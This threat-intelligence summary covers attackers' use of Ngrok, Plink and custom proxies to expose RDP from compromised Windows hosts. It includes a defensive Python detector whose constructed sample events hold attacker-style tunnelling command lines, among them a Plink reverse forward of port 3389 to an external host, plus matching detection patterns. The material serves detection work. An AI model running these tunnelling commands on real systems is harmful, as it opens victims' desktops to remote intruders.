Full Report
After gaining control of infected systems, threat actors often also take remote screen control over RDP. This is partly for convenience, but it also serves to maintain persistence. If the RDP service is not active at the time of the attack, threat actors may install an RDP Wrapper, steal existing account credentials, or create new backdoor […] The post Proxy Tools Detected by AhnLab EDR appeared first on ASEC.
Analysis Summary
# Tool/Technique: Ngrok / Plink / Custom Proxy Tools (used for RDP Tunneling)
## Overview
These tools (Ngrok, Plink, and custom-developed proxies) are utilized by threat actors to bypass network limitations, specifically when infected systems reside behind NAT environments, enabling persistent remote screen control via the Remote Desktop Protocol (RDP) from external attacker systems.
## Technical Details
- Type: Tool (Proxy/Tunneling Utility)
- Platform: Primarily Windows systems compromised by malware. The tools initiate the connection outbound from the victim to an attacker-controlled endpoint, which is why they work even when NAT or a perimeter firewall blocks inbound connections.
- Capabilities: Exposes internal services (specifically RDP port 3389) to the public internet via tunneling or port forwarding.
- First Seen: Not stated for the custom tools; Ngrok has previously been used by Kimsuky.
## MITRE ATT&CK Mapping
- T1090 - Proxy
- T1090.002 - External Proxy
- T1021 - Remote Services
- T1021.001 - Remote Desktop Protocol
## Functionality
### Core Capabilities
- **Ngrok:** Functions as a tunneling tool to expose systems within NAT environments to external access, often aimed at RDP port 3389.
- **Plink (PuTTY component):** The command-line SSH client from the PuTTY suite. Used to establish SSH connections or set up port forwarding, typically a reverse tunnel (`-R`) that exposes the victim's local RDP port (3389) as a listening port on the attacker's SSH server.
- **Custom Proxies:** Threat actors, like Kimsuky and Andariel, develop proprietary proxy tools to achieve the same goal of external RDP exposure.
### Advanced Features
- **RDP Exposure:** The primary advanced feature is manipulating network connectivity to make an internal RDP service accessible over the internet, facilitating remote screen control and post-exploitation persistence.
- **Credential Theft/Backdoor Accounts:** The use of these proxies often follows or coincides with RDP service activation, credential stealing, or the creation of new backdoor accounts.
## Indicators of Compromise
- File Hashes: N/A (Tools are often legitimate binaries used maliciously, or custom files whose hashes are not provided).
- File Names: `p64.exe` (the file name under which Plink was executed in the LockBit case cited).
- Registry Keys: N/A
- Network Indicators:
  - Outbound connections from the victim to external SSH or tunnelling servers operated by the threat actor.
  - A process other than the RDP service binding, forwarding, or exposing the local RDP port (3389).
- Behavioral Indicators:
  - Execution of `ngrok.exe` or `plink.exe` with arguments that set up a remote listener or reverse port forward (the binary may be renamed, so the arguments matter more than the file name).
  - Execution of unknown, custom proxy tools that perform network forwarding.
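The behavioral indicators above reduce to a few command-line patterns: an `ngrok tcp 3389` style tunnel, a `-R` reverse forward whose target is port 3389, and an outbound connection to a non-internal host. The following is an added example, not code from the ASEC report or from AhnLab EDR, that applies those rules to constructed process-creation events modelled on the fields of a Sysmon Event ID 1 record (image path, command line, parent). The sample events, the hypothetical renamed Plink (`p64.exe`) and custom forwarder (`svc.exe`) command lines, and the TEST-NET addresses are all constructed for illustration; the "internal" address list is an assumption (RFC 1918 plus loopback) that a real deployment would replace with its own ranges.

```python
"""Flag process-creation events that look like RDP tunnelling via ngrok, plink or a custom forwarder.

Added example: the events below are constructed, not taken from a real incident.
"""
import ipaddress
import ntpath
import re
import shlex

RDP_PORT = "3389"
KNOWN_TUNNELERS = {"ngrok.exe", "plink.exe"}
# Assumption: RFC 1918 ranges are "internal"; everything else that is not loopback/unspecified is external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
IPV4_RE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")

# Constructed sample events (hypothetical paths and command lines).
SAMPLE_EVENTS = [
    {"image": r"C:\Users\Public\ngrok.exe", "cmdline": "ngrok.exe tcp 3389", "parent": "cmd.exe"},
    {"image": r"C:\ProgramData\p64.exe",  # renamed plink
     "cmdline": "p64.exe -ssh -N -R 0.0.0.0:33389:127.0.0.1:3389 user@203.0.113.10 -pw Passw0rd",
     "parent": "cmd.exe"},
    {"image": r"C:\Windows\Temp\svc.exe",  # hypothetical custom forwarder
     "cmdline": "svc.exe -R 3389 203.0.113.20:443", "parent": "rundll32.exe"},
    {"image": r"C:\Program Files\PuTTY\plink.exe", "cmdline": "plink.exe -ssh admin@10.0.0.5", "parent": "explorer.exe"},
    {"image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe report.txt", "parent": "explorer.exe"},
]


def is_external(ip_text):
    """True if the address is routable outside the (assumed) internal ranges."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    if ip.is_loopback or ip.is_unspecified:
        return False
    return not any(ip in net for net in INTERNAL_NETS)


def reverse_forward_targets(tokens):
    """Return the destination port of every `-R <spec>` argument.

    plink spec: [listen_addr:]listen_port:host:hostport, so the target port is the last field;
    a bare `-R 3389` from a custom tool also yields 3389.
    """
    return [tokens[i + 1].split(":")[-1] for i, tok in enumerate(tokens[:-1]) if tok == "-R"]


def analyze_event(event):
    """Return human-readable reasons why this event is suspicious (empty list if benign)."""
    reasons = []
    image = ntpath.basename(event["image"]).lower()
    tokens = shlex.split(event["cmdline"], posix=False)  # posix=False keeps Windows backslashes intact
    lowered = [t.lower() for t in tokens]

    if image in KNOWN_TUNNELERS:
        reasons.append(f"known tunnelling tool executed: {image}")
    # ngrok exposes a local TCP port with: ngrok tcp <port>
    if "tcp" in lowered and RDP_PORT in lowered and lowered.index("tcp") < lowered.index(RDP_PORT):
        reasons.append("ngrok-style TCP tunnel to RDP port 3389")
    # plink (even renamed) or a custom tool using -R to forward the local RDP port outward
    if RDP_PORT in reverse_forward_targets(tokens):
        reasons.append("reverse port forward (-R) targeting RDP port 3389")
    # Only add the external-host reason as context for an already suspicious event.
    externals = [ip for tok in tokens for ip in IPV4_RE.findall(tok) if is_external(ip)]
    if reasons and externals:
        reasons.append(f"connects to external host(s): {', '.join(externals)}")
    return reasons


def severity(reasons):
    """RDP-specific rules are critical; a known tunneller with no RDP evidence is high."""
    if any(RDP_PORT in r for r in reasons):
        return "critical"
    return "high" if reasons else "none"


def scan(events):
    """Map image path -> (severity, reasons) for every event that fired at least one rule."""
    findings = {}
    for event in events:
        reasons = analyze_event(event)
        if reasons:
            findings[event["image"]] = (severity(reasons), reasons)
    return findings


if __name__ == "__main__":
    for image, (level, reasons) in scan(SAMPLE_EVENTS).items():
        print(f"[{level.upper()}] {image}")
        for reason in reasons:
            print(f"    - {reason}")
```

The renamed Plink and the unknown `svc.exe` are caught by the `-R ... 3389` pattern rather than by file name, which is the point of the behavioral indicators: hashing or naming the binary misses a renamed copy, while a reverse forward whose target is the local RDP port has no routine administrative explanation on an endpoint.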
## Associated Threat Actors
- Kimsuky
- Andariel
- Lazarus Group (used a similar proxy tool in 2021)
- LockBit 3.0 ransomware operators
## Detection Methods
- **Signature-based detection:** AhnLab EDR flags Ngrok execution by name.
- **Behavioral detection:** AhnLab EDR classifies Plink activity as critical behavior and detects proxy tools that expose the RDP service externally, regardless of the binary's file name.
- **YARA rules:** Not explicitly mentioned.
- **Specific EDR Signatures Provided:**
  - `Execution/EDR.Ngrok.M11445`
  - `Execution/EDR.Proxy.M12243`
  - `Execution/DETECT.Plink.M12255`
## Mitigation Strategies
- Implement network segmentation to restrict internal lateral movement.
- Monitor and restrict the execution of known tunneling or proxy tools (Ngrok, Plink) in sensitive environments.
- Harden RDP configuration and restrict inbound RDP connections (TCP 3389) to trusted internal sources only. Note that a perimeter rule alone does not stop this technique, because the tunnel is initiated outbound from the victim; egress filtering toward untrusted SSH/tunnelling endpoints is needed as well.
- Utilize EDR solutions capable of detecting the execution and suspicious network behavior associated with tunneling tools.
## Related Tools/Techniques
- RDP (Remote Desktop Protocol) for remote control/persistence.
- RDP Wrappers (mentioned as an alternative method if RDP is inactive).
- Custom proxy tools developed by threat actors.